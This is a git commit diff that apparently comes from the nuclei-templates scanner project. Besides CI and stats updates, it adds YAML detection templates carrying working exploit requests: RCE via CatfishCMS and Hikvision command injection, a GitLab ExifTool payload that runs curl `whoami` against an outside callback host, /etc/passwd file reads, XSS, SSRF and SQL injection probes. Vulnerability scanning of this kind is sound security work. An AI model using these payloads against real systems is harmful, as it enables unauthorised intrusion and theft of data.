commit
80484df046
|
@ -11,23 +11,19 @@ jobs:
|
||||||
with:
|
with:
|
||||||
go-version: 1.17
|
go-version: 1.17
|
||||||
|
|
||||||
#- name: Cache Go
|
- name: Cache Go
|
||||||
# id: cache-go
|
id: cache-go
|
||||||
# uses: actions/cache@v2
|
uses: actions/cache@v2
|
||||||
# with:
|
with:
|
||||||
# path: /home/runner/go
|
path: /home/runner/go
|
||||||
# key: ${{ runner.os }}-go
|
key: ${{ runner.os }}-go
|
||||||
|
|
||||||
- name: Installing Nuclei
|
- name: Installing Nuclei
|
||||||
# if: steps.cache-go.outputs.cache-hit != 'true'
|
if: steps.cache-go.outputs.cache-hit != 'true'
|
||||||
env:
|
|
||||||
GO111MODULE: on
|
|
||||||
run: |
|
run: |
|
||||||
go install github.com/projectdiscovery/nuclei/v2/cmd/nuclei@dev
|
go install github.com/projectdiscovery/nuclei/v2/cmd/nuclei@latest
|
||||||
shell: bash
|
|
||||||
|
|
||||||
- name: Template Validation
|
- name: Template Validation
|
||||||
run: |
|
run: |
|
||||||
nuclei -validate -t .
|
nuclei -validate -t .
|
||||||
nuclei -validate -w ./workflows
|
nuclei -validate -w ./workflows
|
||||||
shell: bash
|
|
|
@ -1,13 +1,11 @@
|
||||||
name: 🗒 Templates Stats
|
name: 🗒 Templates Stats
|
||||||
|
|
||||||
on:
|
on:
|
||||||
create:
|
|
||||||
workflow_dispatch:
|
workflow_dispatch:
|
||||||
|
|
||||||
jobs:
|
jobs:
|
||||||
build:
|
build:
|
||||||
runs-on: ubuntu-latest
|
runs-on: ubuntu-latest
|
||||||
if: ${{ startsWith(github.ref, 'refs/tags/v') }}
|
|
||||||
steps:
|
steps:
|
||||||
- uses: actions/checkout@master
|
- uses: actions/checkout@master
|
||||||
- uses: actions/setup-go@v2
|
- uses: actions/setup-go@v2
|
||||||
|
|
22
README.md
22
README.md
|
@ -42,18 +42,18 @@ An overview of the nuclei template project, including statistics on unique tags,
|
||||||
|
|
||||||
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|
||||||
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
|
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
|
||||||
| cve | 838 | dhiyaneshdk | 296 | cves | 842 | info | 775 | http | 2244 |
|
| cve | 843 | dhiyaneshdk | 300 | cves | 847 | info | 806 | http | 2286 |
|
||||||
| lfi | 344 | daffainfo | 289 | vulnerabilities | 329 | high | 651 | file | 50 |
|
| lfi | 348 | daffainfo | 290 | vulnerabilities | 332 | high | 655 | file | 51 |
|
||||||
| panel | 284 | pikpikcu | 281 | exposed-panels | 278 | medium | 478 | network | 46 |
|
| panel | 292 | pikpikcu | 281 | exposed-panels | 286 | medium | 483 | network | 46 |
|
||||||
| xss | 259 | pdteam | 201 | technologies | 202 | critical | 297 | dns | 12 |
|
| xss | 260 | pdteam | 202 | technologies | 203 | critical | 299 | dns | 12 |
|
||||||
| wordpress | 255 | geeknik | 166 | exposures | 196 | low | 156 | | |
|
| wordpress | 260 | geeknik | 166 | exposures | 199 | low | 157 | | |
|
||||||
| exposure | 245 | dwisiswant0 | 131 | misconfiguration | 143 | | | | |
|
| exposure | 248 | dwisiswant0 | 152 | misconfiguration | 143 | | | | |
|
||||||
| rce | 215 | gy741 | 83 | takeovers | 65 | | | | |
|
| rce | 218 | gy741 | 83 | token-spray | 83 | | | | |
|
||||||
| tech | 196 | pussycat0x | 74 | token-spray | 63 | | | | |
|
| tech | 197 | pussycat0x | 76 | takeovers | 66 | | | | |
|
||||||
| wp-plugin | 178 | princechaddha | 66 | default-logins | 60 | | | | |
|
| wp-plugin | 180 | princechaddha | 67 | default-logins | 60 | | | | |
|
||||||
| cve2020 | 166 | madrobot | 63 | file | 50 | | | | |
|
| cve2020 | 166 | madrobot | 63 | file | 51 | | | | |
|
||||||
|
|
||||||
**176 directories, 2418 files**.
|
**178 directories, 2459 files**.
|
||||||
|
|
||||||
</td>
|
</td>
|
||||||
</tr>
|
</tr>
|
||||||
|
|
File diff suppressed because one or more lines are too long
1860
TEMPLATES-STATS.md
1860
TEMPLATES-STATS.md
File diff suppressed because it is too large
Load Diff
20
TOP-10.md
20
TOP-10.md
|
@ -1,12 +1,12 @@
|
||||||
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|
||||||
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
|
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
|
||||||
| cve | 838 | dhiyaneshdk | 296 | cves | 842 | info | 775 | http | 2244 |
|
| cve | 843 | dhiyaneshdk | 300 | cves | 847 | info | 806 | http | 2286 |
|
||||||
| lfi | 344 | daffainfo | 289 | vulnerabilities | 329 | high | 651 | file | 50 |
|
| lfi | 348 | daffainfo | 290 | vulnerabilities | 332 | high | 655 | file | 51 |
|
||||||
| panel | 284 | pikpikcu | 281 | exposed-panels | 278 | medium | 478 | network | 46 |
|
| panel | 292 | pikpikcu | 281 | exposed-panels | 286 | medium | 483 | network | 46 |
|
||||||
| xss | 259 | pdteam | 201 | technologies | 202 | critical | 297 | dns | 12 |
|
| xss | 260 | pdteam | 202 | technologies | 203 | critical | 299 | dns | 12 |
|
||||||
| wordpress | 255 | geeknik | 166 | exposures | 196 | low | 156 | | |
|
| wordpress | 260 | geeknik | 166 | exposures | 199 | low | 157 | | |
|
||||||
| exposure | 245 | dwisiswant0 | 131 | misconfiguration | 143 | | | | |
|
| exposure | 248 | dwisiswant0 | 152 | misconfiguration | 143 | | | | |
|
||||||
| rce | 215 | gy741 | 83 | takeovers | 65 | | | | |
|
| rce | 218 | gy741 | 83 | token-spray | 83 | | | | |
|
||||||
| tech | 196 | pussycat0x | 74 | token-spray | 63 | | | | |
|
| tech | 197 | pussycat0x | 76 | takeovers | 66 | | | | |
|
||||||
| wp-plugin | 178 | princechaddha | 66 | default-logins | 60 | | | | |
|
| wp-plugin | 180 | princechaddha | 67 | default-logins | 60 | | | | |
|
||||||
| cve2020 | 166 | madrobot | 63 | file | 50 | | | | |
|
| cve2020 | 166 | madrobot | 63 | file | 51 | | | | |
|
||||||
|
|
|
@ -0,0 +1,27 @@
|
||||||
|
id: CNVD-2019-06255
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: CatfishCMS RCE
|
||||||
|
author: Lark-Lab
|
||||||
|
severity: medium
|
||||||
|
reference: http://112.124.31.29/%E6%BC%8F%E6%B4%9E%E5%BA%93/01-CMS%E6%BC%8F%E6%B4%9E/CatfishCMS/CNVD-2019-06255%20CatfishCMS%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C/
|
||||||
|
tags: rce,cvnd,catfishcms
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/s=set&_method=__construct&method=*&filter[]=system"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
condition: and
|
||||||
|
words:
|
||||||
|
- 'OS'
|
||||||
|
- 'PATH'
|
||||||
|
- 'SHELL'
|
||||||
|
- 'USER'
|
|
@ -0,0 +1,32 @@
|
||||||
|
id: CVE-2015-5471
|
||||||
|
info:
|
||||||
|
name: Swim Team <= v1.44.10777 - Local File Inclusion
|
||||||
|
author: 0x_Akoko
|
||||||
|
severity: medium
|
||||||
|
description: The code in ./wp-swimteam/include/user/download.php doesnt sanitize user input from downloading sensitive system files.
|
||||||
|
reference:
|
||||||
|
- https://wpscan.com/vulnerability/b00d9dda-721d-4204-8995-093f695c3568
|
||||||
|
- http://www.vapid.dhs.org/advisory.php?v=134
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2015-5471
|
||||||
|
tags: cve,cve2015,wordpress,wp-plugin,lfi
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
|
||||||
|
cvss-score: 5.30
|
||||||
|
cve-id: CVE-2015-5471
|
||||||
|
cwe-id: CWE-22
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/wp-content/plugins/wp-swimteam/include/user/download.php?file=/etc/passwd&filename=/etc/passwd&contenttype=text/html&transient=1&abspath=/usr/share/wordpress"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
regex:
|
||||||
|
- "root:[x*]:0:0"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,37 @@
|
||||||
|
id: CVE-2016-1000136
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: heat-trackr v1.0 - XSS via heat-trackr_abtest_add.php
|
||||||
|
author: daffainfo
|
||||||
|
severity: medium
|
||||||
|
description: Reflected XSS in wordpress plugin heat-trackr v1.0
|
||||||
|
reference:
|
||||||
|
- http://www.vapidlabs.com/wp/wp_advisory.php?v=798
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2016-1000136
|
||||||
|
tags: cve,cve2016,wordpress,xss,wp-plugin
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||||
|
cvss-score: 6.10
|
||||||
|
cve-id: CVE-2016-1000136
|
||||||
|
cwe-id: CWE-79
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/wp-content/plugins/heat-trackr/heat-trackr_abtest_add.php?id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- '</script><script>alert(document.domain)</script>'
|
||||||
|
part: body
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: header
|
||||||
|
words:
|
||||||
|
- text/html
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,32 @@
|
||||||
|
id: CVE-2017-0929
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: DotNetNuke ImageHandler SSRF
|
||||||
|
author: charanrayudu,meme-lord
|
||||||
|
severity: high
|
||||||
|
description: DNN (aka DotNetNuke) before 9.2.0 suffers from a Server-Side Request Forgery (SSRF) vulnerability in the DnnImageHandler class. Attackers may be able to access information about internal network resources.
|
||||||
|
reference:
|
||||||
|
- https://hackerone.com/reports/482634
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2017-0929
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
||||||
|
cvss-score: 7.50
|
||||||
|
cve-id: CVE-2017-0929
|
||||||
|
cwe-id: CWE-918
|
||||||
|
tags: cve,cve2017,oast,ssrf,dnn
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- '{{BaseURL}}/DnnImageHandler.ashx?mode=file&url=http://{{interactsh-url}}'
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
part: interactsh_protocol
|
||||||
|
words:
|
||||||
|
- "http"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 500
|
|
@ -4,6 +4,7 @@ info:
|
||||||
name: Etherpad Lite before 1.6.4 is exploitable for admin access.
|
name: Etherpad Lite before 1.6.4 is exploitable for admin access.
|
||||||
author: philippedelteil
|
author: philippedelteil
|
||||||
severity: critical
|
severity: critical
|
||||||
|
description: Etherpad Lite before 1.6.4 is exploitable for admin access.
|
||||||
reference:
|
reference:
|
||||||
- https://infosecwriteups.com/account-takeovers-believe-the-unbelievable-bb98a0c251a4
|
- https://infosecwriteups.com/account-takeovers-believe-the-unbelievable-bb98a0c251a4
|
||||||
- https://github.com/ether/etherpad-lite/commit/ffe24c3dd93efc73e0cbf924db9a0cc40be9511b
|
- https://github.com/ether/etherpad-lite/commit/ffe24c3dd93efc73e0cbf924db9a0cc40be9511b
|
||||||
|
|
|
@ -6,7 +6,7 @@ info:
|
||||||
severity: medium
|
severity: medium
|
||||||
description: An email address enumeration vulnerability exists in the password reset function of Rocket.Chat through 3.9.1.
|
description: An email address enumeration vulnerability exists in the password reset function of Rocket.Chat through 3.9.1.
|
||||||
reference: https://trovent.io/security-advisory-2010-01
|
reference: https://trovent.io/security-advisory-2010-01
|
||||||
tags: cve,cve2020,rockethchat
|
tags: cve,cve2020,rocketchat
|
||||||
classification:
|
classification:
|
||||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
|
||||||
cvss-score: 5.30
|
cvss-score: 5.30
|
||||||
|
|
|
@ -0,0 +1,63 @@
|
||||||
|
id: CVE-2021-22205
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: GitLab CE/EE Unauthenticated RCE using ExifTool
|
||||||
|
author: pdteam
|
||||||
|
severity: critical
|
||||||
|
description: An issue has been discovered in GitLab CE/EE affecting all versions starting from 11.9. GitLab was not properly validating image files that were passed to a file parser which resulted in a remote command execution.
|
||||||
|
reference:
|
||||||
|
- https://security.humanativaspa.it/gitlab-ce-cve-2021-22205-in-the-wild/
|
||||||
|
- https://hackerone.com/reports/1154542
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-22205
|
||||||
|
tags: cve,cve2021,gitlab,rce,oast
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
|
||||||
|
cvss-score: 9.90
|
||||||
|
cve-id: CVE-2021-22205
|
||||||
|
cwe-id: CWE-20
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
GET /users/sign_in HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Origin: {{BaseURL}}
|
||||||
|
|
||||||
|
- |
|
||||||
|
POST /uploads/user HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryIMv3mxRg59TkFSX5
|
||||||
|
X-CSRF-Token: {{csrf-token}}
|
||||||
|
|
||||||
|
{{hex_decode('0D0A2D2D2D2D2D2D5765624B6974466F726D426F756E64617279494D76336D7852673539546B465358350D0A436F6E74656E742D446973706F736974696F6E3A20666F726D2D646174613B206E616D653D2266696C65223B2066696C656E616D653D22746573742E6A7067220D0A436F6E74656E742D547970653A20696D6167652F6A7065670D0A0D0A41542654464F524D000003AF444A564D4449524D0000002E81000200000046000000ACFFFFDEBF992021C8914EEB0C071FD2DA88E86BE6440F2C7102EE49D36E95BDA2C3223F464F524D0000005E444A5655494E464F0000000A00080008180064001600494E434C0000000F7368617265645F616E6E6F2E696666004247343400000011004A0102000800088AE6E1B137D97F2A89004247343400000004010FF99F4247343400000002020A464F524D00000307444A5649414E546100000150286D657461646174610A0928436F7079726967687420225C0A22202E2071787B')}}curl `whoami`.{{interactsh-url}}{{hex_decode('7D202E205C0A2220622022292029202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020200A0D0A2D2D2D2D2D2D5765624B6974466F726D426F756E64617279494D76336D7852673539546B465358352D2D0D0A')}}
|
||||||
|
|
||||||
|
cookie-reuse: true
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- 'Failed to process image'
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: interactsh_protocol # Confirms the DNS Interaction
|
||||||
|
words:
|
||||||
|
- "dns"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 422
|
||||||
|
|
||||||
|
extractors:
|
||||||
|
- type: regex
|
||||||
|
name: csrf-token
|
||||||
|
internal: true
|
||||||
|
group: 1
|
||||||
|
regex:
|
||||||
|
- 'csrf-token" content="(.*?)" />\n\n<meta'
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
name: whoami
|
||||||
|
part: interactsh_request
|
||||||
|
group: 1
|
||||||
|
regex:
|
||||||
|
- '([a-z0-9]+)\.([a-z0-9]+)\.interactsh\.com'
|
|
@ -0,0 +1,49 @@
|
||||||
|
id: CVE-2021-36260
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Hikvision IP camera/NVR - Unauthenticated RCE
|
||||||
|
author: pdteam,gy741
|
||||||
|
severity: critical
|
||||||
|
description: A command injection vulnerability in the web server of some Hikvision product. Due to the insufficient input validation, attacker can exploit the vulnerability to launch a command injection attack by sending some messages with malicious commands.
|
||||||
|
reference:
|
||||||
|
- https://watchfulip.github.io/2021/09/18/Hikvision-IP-Camera-Unauthenticated-RCE.html
|
||||||
|
- https://www.hikvision.com/en/support/cybersecurity/security-advisory/security-notification-command-injection-vulnerability-in-some-hikvision-products/
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-36260
|
||||||
|
- https://github.com/Aiminsun/CVE-2021-36260
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||||
|
cvss-score: 9.8
|
||||||
|
cve-id: CVE-2021-36260
|
||||||
|
cwe-id: CWE-77,CWE-20
|
||||||
|
metadata:
|
||||||
|
shodan-query: http.favicon.hash:999357577
|
||||||
|
tags: cve,cve2021,hikvision,rce,iot,intrusive
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
PUT /SDK/webLanguage HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
|
||||||
|
|
||||||
|
<?xml version="1.0" encoding="UTF-8"?><language>$(id>webLib/x)</language>
|
||||||
|
|
||||||
|
- |
|
||||||
|
GET /x HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
req-condition: true
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- "contains(body_2,'uid=') && contains(body_2,'gid=')"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
||||||
|
|
||||||
|
extractors:
|
||||||
|
- type: regex
|
||||||
|
regex:
|
||||||
|
- "(u|g)id=.*"
|
|
@ -0,0 +1,35 @@
|
||||||
|
id: CVE-2021-36749
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Apache Druid Authentication Restrictions Bypass
|
||||||
|
author: _0xf4n9x_
|
||||||
|
severity: medium
|
||||||
|
description: In the Druid ingestion system, the InputSource is used for reading data from a certain data source. However, the HTTP InputSource allows authenticated users to read data from other sources than intended, such as the local file system, with the privileges of the Druid server process. This is not an elevation of privilege when users access Druid directly, since Druid also provides the Local InputSource, which allows the same level of access. But it is problematic when users interact with Druid indirectly through an application that allows users to specify the HTTP InputSource, but not the Local InputSource. In this case, users could bypass the application-level restriction by passing a file URL to the HTTP InputSource. This issue was previously mentioned as being fixed in 0.21.0 as per CVE-2021-26920 but was not fixed in 0.21.0 or 0.21.1.
|
||||||
|
reference:
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-36749
|
||||||
|
- https://www.cvedetails.com/cve/CVE-2021-36749/
|
||||||
|
- https://github.com/BrucessKING/CVE-2021-36749
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
|
||||||
|
cvss-score: 6.5
|
||||||
|
cve-id: CVE-2021-36749
|
||||||
|
cwe-id: CWE-668
|
||||||
|
tags: cve,cve2021,apache,lfi,auth-bypass
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
POST /druid/indexer/v1/sampler?for=connect HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Content-Type: application/json
|
||||||
|
|
||||||
|
{"type":"index","spec":{"type":"index","ioConfig":{"type":"index","firehose":{"type":"http","uris":[" file:///etc/passwd "]}},"dataSchema":{"dataSource":"sample","parser":{"type":"string", "parseSpec":{"format":"regex","pattern":"(.*)","columns":["a"],"dimensionsSpec":{},"timestampSpec":{"column":"no_ such_ column","missingValue":"2010-01-01T00:00:00Z"}}}}},"samplerConfig":{"numRows":500,"timeoutMs":15000}}
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: regex
|
||||||
|
part: body
|
||||||
|
regex:
|
||||||
|
- "root:.*:0:0:"
|
||||||
|
- "druid:*:1000:1000:"
|
||||||
|
condition: or
|
|
@ -0,0 +1,69 @@
|
||||||
|
id: CVE-2021-42258
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: BillQuick Web Suite SQLi
|
||||||
|
author: dwisiswant0
|
||||||
|
severity: critical
|
||||||
|
tags: cve,cve2021,sqli,billquick
|
||||||
|
description: |
|
||||||
|
BQE BillQuick Web Suite 2018 through 2021 before 22.0.9.1
|
||||||
|
allows SQL injection for unauthenticated remote code execution,
|
||||||
|
as exploited in the wild in October 2021 for ransomware installation.
|
||||||
|
SQL injection can, for example, use the txtID (aka username) parameter.
|
||||||
|
Successful exploitation can include the ability to execute
|
||||||
|
arbitrary code as MSSQLSERVER$ via xp_cmdshell.
|
||||||
|
reference:
|
||||||
|
- https://www.huntress.com/blog/threat-advisory-hackers-are-exploiting-a-vulnerability-in-popular-billing-software-to-deploy-ransomware
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-42258
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||||
|
cvss-score: 9.80
|
||||||
|
cve-id: CVE-2021-42258
|
||||||
|
cwe-id: CWE-89
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
GET / HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
- |
|
||||||
|
POST / HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Referer: {{BaseURL}}
|
||||||
|
Origin: {{RootURL}}
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
|
||||||
|
__EVENTTARGET=cmdOK&__EVENTARGUMENT=&__VIEWSTATE={{url_encode("§VS§")}}&__VIEWSTATEGENERATOR={{url_encode("§VSG§")}}&__EVENTVALIDATION={{url_encode("§EV§")}}&txtID=uname%27&txtPW=passwd&hdnClientDPI=96
|
||||||
|
|
||||||
|
cookie-reuse: true
|
||||||
|
extractors:
|
||||||
|
- type: xpath
|
||||||
|
name: VS
|
||||||
|
internal: true
|
||||||
|
attribute: value
|
||||||
|
xpath:
|
||||||
|
- "/html/body/form/div/input[@id='__VIEWSTATE']"
|
||||||
|
|
||||||
|
- type: xpath
|
||||||
|
name: VSG
|
||||||
|
internal: true
|
||||||
|
attribute: value
|
||||||
|
xpath:
|
||||||
|
- "/html/body/form/div/input[@id='__VIEWSTATEGENERATOR']"
|
||||||
|
|
||||||
|
- type: xpath
|
||||||
|
name: EV
|
||||||
|
internal: true
|
||||||
|
attribute: value
|
||||||
|
xpath:
|
||||||
|
- "/html/body/form/div/input[@id='__EVENTVALIDATION']"
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
part: body
|
||||||
|
condition: and
|
||||||
|
words:
|
||||||
|
- "System.Data.SqlClient.SqlException"
|
||||||
|
- "Incorrect syntax near"
|
||||||
|
- "_ACCOUNTLOCKED"
|
|
@ -0,0 +1,39 @@
|
||||||
|
id: CVE-2021-42565
|
||||||
|
|
||||||
|
info:
|
||||||
|
author: madrobot
|
||||||
|
name: myfactory FMS - Reflected XSS
|
||||||
|
severity: medium
|
||||||
|
description: myfactory.FMS before 7.1-912 allows XSS via the UID parameter.
|
||||||
|
reference:
|
||||||
|
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-42566
|
||||||
|
- https://www.redteam-pentesting.de/en/advisories/rt-sa-2021-001/-cross-site-scripting-in-myfactory-fms
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||||
|
cvss-score: 6.10
|
||||||
|
cve-id: CVE-2021-42565
|
||||||
|
cwe-id: CWE-79
|
||||||
|
tags: cve,cve2021,myfactory,xss
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- '{{BaseURL}}/ie50/system/login/SysLoginUser.aspx?Login=Denied&UID=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
||||||
|
- '{{BaseURL}}/system/login/SysLoginUser.aspx?Login=Denied&UID=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: body
|
||||||
|
words:
|
||||||
|
- "</script><script>alert(document.domain)</script>"
|
||||||
|
condition: and
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: header
|
||||||
|
words:
|
||||||
|
- "text/html"
|
|
@ -0,0 +1,39 @@
|
||||||
|
id: CVE-2021-42566
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: myfactory FMS - Reflected XSS
|
||||||
|
author: madrobot
|
||||||
|
severity: medium
|
||||||
|
description: myfactory.FMS before 7.1-912 allows XSS via the Error parameter.
|
||||||
|
reference:
|
||||||
|
- https://www.redteam-pentesting.de/en/advisories/rt-sa-2021-001/-cross-site-scripting-in-myfactory-fms
|
||||||
|
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-42566
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||||
|
cvss-score: 6.10
|
||||||
|
cve-id: CVE-2021-42566
|
||||||
|
cwe-id: CWE-79
|
||||||
|
tags: cve,cve2021,myfactory,xss
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- '{{BaseURL}}/ie50/system/login/SysLoginUser.aspx?Login=Error&Error=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
||||||
|
- '{{BaseURL}}/system/login/SysLoginUser.aspx?Login=Error&Error=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: body
|
||||||
|
words:
|
||||||
|
- "</script><script>alert(document.domain)</script>"
|
||||||
|
condition: and
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: header
|
||||||
|
words:
|
||||||
|
- "text/html"
|
|
@ -11,7 +11,7 @@ dns:
|
||||||
type: CNAME
|
type: CNAME
|
||||||
class: inet
|
class: inet
|
||||||
recursion: true
|
recursion: true
|
||||||
retries: 5
|
retries: 3
|
||||||
|
|
||||||
matchers-condition: or
|
matchers-condition: or
|
||||||
matchers:
|
matchers:
|
||||||
|
@ -29,3 +29,8 @@ dns:
|
||||||
name: announcekit
|
name: announcekit
|
||||||
words:
|
words:
|
||||||
- "cname.announcekit.app"
|
- "cname.announcekit.app"
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
name: wix
|
||||||
|
words:
|
||||||
|
- "wixdns.net"
|
||||||
|
|
|
@ -0,0 +1,24 @@
|
||||||
|
id: openemr-detect
|
||||||
|
info:
|
||||||
|
name: OpenEMR Product Detect
|
||||||
|
author: pussycat0x
|
||||||
|
severity: info
|
||||||
|
metadata:
|
||||||
|
shodan-dork: 'app="OpenEMR"'
|
||||||
|
tags: panel,openemr
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/interface/login/login.php?site=default"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
part: body
|
||||||
|
words:
|
||||||
|
- '"title":"OpenEMR Product Registration"'
|
||||||
|
